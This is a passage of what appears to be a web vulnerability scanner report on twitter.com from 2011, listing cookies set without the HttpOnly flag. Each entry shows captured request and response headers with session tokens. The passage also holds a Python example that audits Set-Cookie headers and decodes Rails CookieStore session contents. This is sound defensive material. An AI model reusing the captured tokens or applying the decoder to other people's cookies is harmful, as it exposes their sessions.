User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265830-80729-13721
ETag: "3e686e5003db7b91a9692a9a7630bbcc"
Last-Modified: Sat, 29 Jan 2011 01:50:30 GMT
X-Runtime: 0.00912
Content-Type: text/html; charset=utf-8
Content-Length: 47073
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.111. http://twitter.com/kfaulk33

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /kfaulk33

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kfaulk33 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265289-31703-49385
ETag: "41ff3b86a38408792b4fb731bddc8cc7"
Last-Modified: Sat, 29 Jan 2011 01:41:29 GMT
X-Runtime: 0.00715
Content-Type: text/html; charset=utf-8
Content-Length: 19131
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.112. http://twitter.com/lapubell

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /lapubell

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lapubell HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225026-90981-8371
ETag: "aa94e1eda1d46648c91aba85f6351309"
Last-Modified: Fri, 28 Jan 2011 14:30:26 GMT
X-Runtime: 0.00798
Content-Type: text/html; charset=utf-8
Content-Length: 38074
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.113. http://twitter.com/lapubell/status/28131682842312704

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /lapubell/status/28131682842312704

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lapubell/status/28131682842312704 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225027-9054-47693
ETag: "f065429d1dda5b9db71fafac7ff44f41"
Last-Modified: Fri, 28 Jan 2011 14:30:27 GMT
X-Runtime: 0.05699
Content-Type: text/html; charset=utf-8
Content-Length: 13805
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vbGFwdWJlbGwv%250Ac3RhdHVzLzI4MTMxNjgyODQyMzEyNzA0Ogxjc3JmX2lkIiViYzI0ZWFiYzYx%250AZjk3NTNkYjBiMDU5MDZiZWFkZTZkNDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--73b1d4476b98de5154e4e6006eaf9f2cc116e66c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.114. http://twitter.com/lindapizzuti

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /lindapizzuti

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lindapizzuti HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 404 Not Found
Date: Sat, 29 Jan 2011 01:53:26 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296266005-54049-23523
Last-Modified: Sat, 29 Jan 2011 01:53:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbGluZGFwaXp6%250AdXRpOgx0el9uYW1lIhRDZW50cmFsIEFtZXJpY2E6DGNzcmZfaWQiJWFiYzQ1%250ANWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOhVpbl9uZXdfdXNlcl9mbG93%250AMDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--178659bc16aec601c68a4ccb180ddd6c5bcd3dc3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

11.115. http://twitter.com/login

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-89084-19137
ETag: "849e44ccdc2da8651621c818bd6cc65c"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-Runtime: 0.03302
Content-Type: text/html; charset=utf-8
Content-Length: 12714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzhmZTI4YjQwNmVmYjgxZGY5YWI0MGFkNWYyNjIx%250AOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--54109c50eed6759247aa1ca10510e42039e66977; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.116. http://twitter.com/malsup

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). One of them appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /malsup HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://malsup.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1295994766153789

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:04:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296223456-14164-3404
ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip
Last-Modified: Fri, 28 Jan 2011 14:04:16 GMT
X-Runtime: 0.01613
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 49593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
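The two checks these entries rest on, as an added example that is not code from the scanner or from the report's author: a Set-Cookie audit that flags missing HttpOnly and Secure attributes while skipping deletion cookies such as the auth_token= line present in every twitter.com response above, and a decoder for the Rails 2.x CookieStore format that _twitter_sess uses (base64 Marshal dump, then "--", then a hex HMAC-SHA1), which is what "review the contents of the cookie" amounts to here. The sample headers are copied from the response in entry 11.116; the Marshal reader handles only the node types found in such session cookies, and both it and the session-name regex are assumptions of this example rather than anything the scanner documents. A Secure finding is only meaningful once the site is served over HTTPS, which twitter.com is not in this report.

```python
"""Added example, not part of the scanner report: audit Set-Cookie headers for missing
HttpOnly/Secure flags and decode a Rails 2.x CookieStore session value, so the report's
'review the contents of the cookie' step can be done offline.  Sample headers are copied
from entry 11.116; the Marshal reader covers only the node types such sessions use."""
import base64, re, urllib.parse
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

SESSION_NAME_RE = re.compile(r"sess|auth|token|sid", re.I)   # name heuristic, an assumption of this example

def audit_set_cookie(header_value, now=None):
    """Findings for one Set-Cookie value.  A deletion cookie (empty value, expiry in the past, like the
    'auth_token=' line in every response above) is reported as cleared and gets no flag findings."""
    now = now or datetime.now(timezone.utc)
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {k.strip().lower(): v.strip() for k, v in (p.partition("=")[::2] for p in parts[1:])}
    expires = parsedate_to_datetime(attrs["expires"]) if "expires" in attrs else None
    cleared = value == "" and expires is not None and expires < now
    missing = [] if cleared else [f for f in ("HttpOnly", "Secure") if f.lower() not in attrs]
    return {"name": name.strip(), "cleared": cleared, "missing": missing,
            "session_like": bool(SESSION_NAME_RE.search(name)),
            "domain": attrs.get("domain", "")}   # a leading dot: readable from every subdomain

def audit_response(raw_response, now=None):
    """Apply audit_set_cookie to every Set-Cookie header of a raw HTTP response."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    return [audit_set_cookie(line.split(":", 1)[1], now)
            for line in head.splitlines() if line.lower().startswith("set-cookie:")]

def _int(buf, pos):
    # Marshal 4.8 packed integer: 0, a one-byte value offset by 5, or a length-prefixed little-endian int
    c = buf[pos] - 256 if buf[pos] > 127 else buf[pos]
    if c == 0 or abs(c) >= 5: return (0 if c == 0 else c - 5 if c > 0 else c + 5), pos + 1
    n = int.from_bytes(buf[pos + 1:pos + 1 + abs(c)], "little")
    return (n if c > 0 else n - (1 << (8 * -c))), pos + 1 + abs(c)

def _ivars(buf, pos, syms, target):
    n, pos = _int(buf, pos)                        # instance-variable count, then symbol/value pairs
    for _ in range(n):
        k, pos = _parse(buf, pos, syms)
        target[k], pos = _parse(buf, pos, syms)
    return pos

def _parse(buf, pos, syms):
    """Ruby Marshal subset: symbols and strings both come back as str, 'C'/'o' objects as dicts."""
    t, pos = chr(buf[pos]), pos + 1
    if t in "0TF": return {"0": None, "T": True, "F": False}[t], pos
    if t == "i": return _int(buf, pos)
    if t in ':";':                                 # symbol, string, symbol back-reference
        n, pos = _int(buf, pos)
        if t == ";": return syms[n], pos
        s = buf[pos:pos + n].decode("utf-8", "replace")
        if t == ":": syms.append(s)
        return s, pos + n
    if t == "l":                                   # bignum: sign, length in 16-bit words, LE bytes
        sign, (n, pos) = chr(buf[pos]), _int(buf, pos + 1)
        v = int.from_bytes(buf[pos:pos + 2 * n], "little")
        return (-v if sign == "-" else v), pos + 2 * n
    if t in "[{":                                  # array, or hash read as 2n items
        n, pos = _int(buf, pos)
        items = []
        for _ in range(n if t == "[" else 2 * n):
            v, pos = _parse(buf, pos, syms)
            items.append(v)
        return (items if t == "[" else dict(zip(items[::2], items[1::2]))), pos
    if t in "Co":                                  # C: class name + wrapped value; o: class name + ivars
        cls, pos = _parse(buf, pos, syms)
        obj = {"__class__": cls, "ivars": {}, "wrapped": None}
        if t == "o": return obj, _ivars(buf, pos, syms, obj["ivars"])
        obj["wrapped"], pos = _parse(buf, pos, syms)
        return obj, pos
    if t == "I":                                   # any value followed by its instance variables
        obj, pos = _parse(buf, pos, syms)
        ivars = obj["ivars"] if isinstance(obj, dict) and "__class__" in obj else {}  # string encodings dropped
        return obj, _ivars(buf, pos, syms, ivars)
    raise ValueError(f"unsupported Marshal type {t!r} at offset {pos - 1}")

def decode_rails_session(cookie_value):
    """Rails 2.x CookieStore: base64(Marshal.dump(hash)) + '--' + hex HMAC-SHA1 of the base64 part.  Signed
    but not encrypted, so every key is readable; the signature needs the app secret, which we lack."""
    for _ in range(3): cookie_value = urllib.parse.unquote(cookie_value)   # the report percent-encodes twice
    data, sep, sig = cookie_value.rpartition("--")
    if not sep or not re.fullmatch(r"[0-9a-f]{40}", sig): raise ValueError("not a signed CookieStore value")
    blob = base64.b64decode(data)                  # non-alphabet bytes (the embedded newlines) are dropped
    if blob[:2] != b"\x04\x08": raise ValueError("not a Ruby Marshal 4.8 stream")
    return _parse(blob, 2, [])[0], sig

# Copied from the response in entry 11.116 (twitter.com, Fri 28 Jan 2011 14:04:16 GMT).
SAMPLE_SESSION_COOKIE = ("BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250A"
                         "bGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250A"
                         "OgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475")
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\nDate: Fri, 28 Jan 2011 14:04:16 GMT\r\n"
                   "Set-Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/\r\n"
                   "Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\r\n"
                   "Set-Cookie: _twitter_sess=" + SAMPLE_SESSION_COOKIE + "; domain=.twitter.com; path=/\r\n"
                   "\r\n<!DOCTYPE html ...")

if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE): print(finding)
    print(*decode_rails_session(SAMPLE_SESSION_COOKIE))
```

Run as-is it prints three findings (original_referer and _twitter_sess lack HttpOnly; auth_token is a deletion cookie and is skipped) and decodes the session to a three-key hash: the session id, an empty FlashHash, and created_at in milliseconds, which is 14:04:16 GMT on 28 Jan 2011, the Date of the 11.116 response that issued the cookie to a request carrying no _twitter_sess. Two points a practitioner would add to this finding: the missing attribute is a single session-store setting, so every twitter.com path listed in this section is one fix rather than one per entry; and because CookieStore signs but does not encrypt, whatever the application puts in the session (on other entries here: csrf_id, return_to URLs, tz_name) is readable by anyone holding the cookie whether or not HttpOnly is set, which only stops script on the page from reading it.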

11.117. http://twitter.com/malsup/favorites

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/favorites

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224911-48509-36720
ETag: "aa813f25e26e58a8fc00a80271530b6f"
Last-Modified: Fri, 28 Jan 2011 14:28:31 GMT
X-Runtime: 0.28607
Content-Type: text/html; charset=utf-8
Content-Length: 57347
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOWM3MDM0NDIyYzY2M2ZkMzM0YWE1NDgwMzg1NWRh%250AM2U6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--316ed1acac7dec68e9460d11f94a8de8f6191911; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.118. http://twitter.com/malsup/followers

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/followers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/followers HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
